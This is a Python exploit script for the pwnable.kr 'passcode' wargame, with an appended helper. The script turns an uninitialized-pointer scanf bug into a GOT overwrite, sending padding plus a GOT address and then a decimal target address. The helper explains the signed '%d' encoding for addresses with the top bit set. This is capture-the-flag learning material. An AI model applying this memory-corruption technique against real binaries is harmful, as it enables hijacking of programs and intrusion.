exploit.py
"""
Exploit for the pwnable.kr "passcode" challenge: an arbitrary 4-byte write
through scanf("%d", passcode1), turned into a GOT overwrite.

login() runs right after welcome() and its frame is laid out from the same
ebp, so login()'s uninitialized local passcode1 still holds whatever
welcome() left at that stack slot: the last 4 bytes of the 100-byte name
buffer (offset 96). login() then calls scanf("%d", passcode1) with the
variable itself instead of &passcode1, so the integer the user types is
written to whatever address passcode1 contains.

So we place the address of a GOT entry at the end of the name string, then
send the address of the code we want to run (as a decimal string, since %d
parses an integer) as passcode1. The next call through that GOT slot jumps
to our address and we get arbitrary code execution.
"""
from pwn import *


def exploit():
    # Connect to the target through ssh
    s = ssh(user='passcode', host='pwnable.kr', password='guest', port=2222)
    # Spawn the vulnerable binary on the remote host
    p = s.process('./passcode')

    # GOT entry to overwrite; found with `objdump -R passcode`
    got_func_address = p32(0x0804a004)
    # The name buffer is 100 bytes and its last 4 bytes become login()'s
    # passcode1. The offset was confirmed with pwn cyclic and gdb.
    offset = b'A' * 96
    # Payload that welcome() stores in the name buffer
    payload = offset + got_func_address

    # Read the welcome banner / prompt
    print(p.recv())
    # Send the name: padding plus the GOT address
    p.sendline(payload)
    # scanf("%d") parses a decimal integer, so the value to write into the
    # GOT slot is sent as its decimal string, not as raw bytes
    new_addr = str(0x080485d7).encode()
    # Sent as passcode1: scanf writes it to *passcode1, i.e. the GOT entry
    p.sendline(new_addr)
    # Print everything the program outputs afterwards (the flag, if it worked)
    print(p.recvall())
    p.close()
    s.close()


if __name__ == '__main__':
    exploit()
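Added example, not part of the original exploit.py: a pwntools-free helper that builds the same two inputs the script sends and models what a 32-bit glibc `scanf("%d", ptr)` actually stores. It also covers a case the script above never hits: a target dword with the top bit set (a libc address such as 0xf7xxxxxx) has to be sent as a negative decimal, because `%d` parses a signed int and out-of-range digits saturate instead of wrapping. The address 0xf7e5ccf0 below is a constructed value, not one from the challenge, and the saturating-`strtol` model of glibc's `%d` conversion is an assumption about the 32-bit target.

```python
import struct

INT32_MIN, INT32_MAX = -2**31, 2**31 - 1


def encode_for_scanf_d(dword: int) -> bytes:
    """Return the decimal text scanf("%d", ptr) must read so that the
    4 bytes it stores at ptr equal `dword` (little-endian).

    %d parses a *signed* int, so any dword with the top bit set has to be
    sent as a negative number (two's-complement reinterpretation).
    """
    if not 0 <= dword <= 0xFFFFFFFF:
        raise ValueError("dword must fit in 32 bits")
    if dword > INT32_MAX:
        dword -= 1 << 32
    return str(dword).encode()


def dword_written(decimal_text: bytes) -> bytes:
    """Model of what 32-bit glibc scanf("%d", ptr) stores for one decimal
    token. Assumption: glibc converts with strtol, so on a 32-bit target
    out-of-range input saturates at INT32_MAX / INT32_MIN rather than
    wrapping. Returns the 4 bytes that end up at ptr.
    """
    value = int(decimal_text)
    value = max(INT32_MIN, min(INT32_MAX, value))
    return struct.pack("<i", value)


def build_overlap_payload(got_entry: int, pad: int = 96) -> bytes:
    """Input for welcome()'s 100-byte name buffer: `pad` filler bytes, then
    the GOT address that must land in the slot login() later reads as the
    uninitialized passcode1 (offset 96 on the passcode binary).
    """
    return b"A" * pad + struct.pack("<I", got_entry)


if __name__ == "__main__":
    got_entry = 0x0804A004      # GOT slot from `objdump -R passcode`
    target = 0x080485D7         # address to store in that slot
    print(build_overlap_payload(got_entry))
    print(encode_for_scanf_d(target))                            # b'134514135'

    # Edge case: a libc-style address (constructed value) sent as plain
    # unsigned decimal saturates; the signed encoding lands correctly.
    libc_addr = 0xF7E5CCF0
    print(dword_written(str(libc_addr).encode()).hex())          # ffffff7f
    print(dword_written(encode_for_scanf_d(libc_addr)).hex())    # f0cce5f7
```

The first two calls reproduce exactly what the exploit sends; `dword_written` is what you run against a candidate address before spending a connection on it, since a saturated write silently turns the GOT slot into 0x7fffffff instead of your target.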